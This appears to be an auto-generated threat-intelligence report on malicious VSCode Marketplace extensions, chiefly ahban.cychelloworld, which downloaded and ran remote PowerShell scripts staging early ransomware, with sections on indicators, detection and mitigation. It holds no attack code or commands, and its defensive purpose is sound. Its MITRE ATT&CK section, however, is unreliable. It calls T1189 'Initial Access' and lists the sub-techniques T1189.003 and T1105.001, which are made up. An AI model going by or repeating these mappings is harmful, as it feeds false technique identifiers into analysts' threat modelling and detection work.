Full Report
Two malicious VSCode Marketplace extensions were found deploying in-development ransomware from a remote server, exposing critical gaps in Microsoft's review process. [...]
Analysis Summary
# Tool/Technique: Malicious VSCode Extensions (ahban.cychelloworld)
## Overview
This entry describes a threat involving malicious extensions submitted to the Visual Studio Code (VSCode) Marketplace that downloaded and executed early-stage ransomware payloads on victim machines. The initial malicious version of one extension was accepted and remained active for several months, indicating a flaw in the marketplace's review process.
## Technical Details
- Type: Malware Delivery Mechanism (via legitimate platform distribution)
- Platform: VSCode (Visual Studio Code) environments, implying targeting developer machines running Windows, macOS, or Linux where VSCode executes.
- Capabilities: Downloading and executing remote PowerShell scripts containing ransomware artifacts.
- First Seen: The malicious version (0.0.2) of `ahban.cychelloworld` was accepted on the VSCode Marketplace on November 24, 2024.
## MITRE ATT&CK Mapping
*Note: Since the primary focus is delivery and initial execution via a remote script download, the mappings below reflect the execution chain mentioned.*
- T1189 - Initial Access
- T1189.003 - Drive-by Compromise (Can be loosely mapped if the malicious content is pulled automatically upon extension activation/installation)
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- T1105 - Ingress Tool Transfer
- T1105.001 - Ingress from Known Cloud Services (If the remote script is hosted on a recognized cloud service)
## Functionality
### Core Capabilities
- **Initial Distribution:** Hosted malicious code within a seemingly legitimate VSCode extension hosted on the official VSCode Marketplace.
- **Payload Fetching:** Upon installation or execution, the extension downloaded and executed remote PowerShell scripts.
### Advanced Features
- **Evasion/Persistence:** The extensions reportedly remained undetected for almost four months, suggesting the initial payload delivery mechanism or the scripts themselves were designed to avoid immediate signature detection during review processes.
- **Ransomware Staging:** The delivery mechanism was explicitly designed to fetch "early-stage ransomware."
## Indicators of Compromise
- **File Hashes:** (Not provided in the context)
- **File Names:** VSCode extensions named `ahban.cychelloworld` and potentially others mentioned (though only one is explicitly detailed).
- **Registry Keys:** (Not provided in the context)
- **Network Indicators:** The capability relies on connecting to external servers to download malicious PowerShell scripts (C2 communication is implied but specific indicators are omitted).
- **Behavioral Indicators:**
- Installation/activation of specific untrusted VSCode extensions.
- Execution of PowerShell scripts originating from network connections initiated by the VSCode process or its extensions.
## Associated Threat Actors
- The context does not name a specific threat actor group, only referencing the malicious nature of the extensions.
## Detection Methods
- **Signature-based detection:** Ineffective initially, as the malicious actors successfully bypassed the review process for a period.
- **Behavioral detection:** Essential for catching the execution of remote PowerShell scripts initiated by development tools or extensions.
- **YARA rules:** (Not provided in the context)
## Mitigation Strategies
- **Prevention Measures:**
- Organizations should vet and restrict developer use of untrusted third-party marketplace extensions.
- Security scanners should be implemented to monitor software deployment processes (like ExtensionTotal's scanner mentioned).
- **Hardening Recommendations:**
- Apply strict application control policies to limit unintended script execution capabilities, particularly PowerShell, originating from non-standard processes.
- Review the security practices and review speeds of software distribution platforms (like the VSCode Marketplace).
## Related Tools/Techniques
- Malicious extensions across other IDEs/Editors (e.g., extensions used for phishing or credential theft).
- Supply chain compromise techniques leveraging trusted vendor platforms for malware distribution.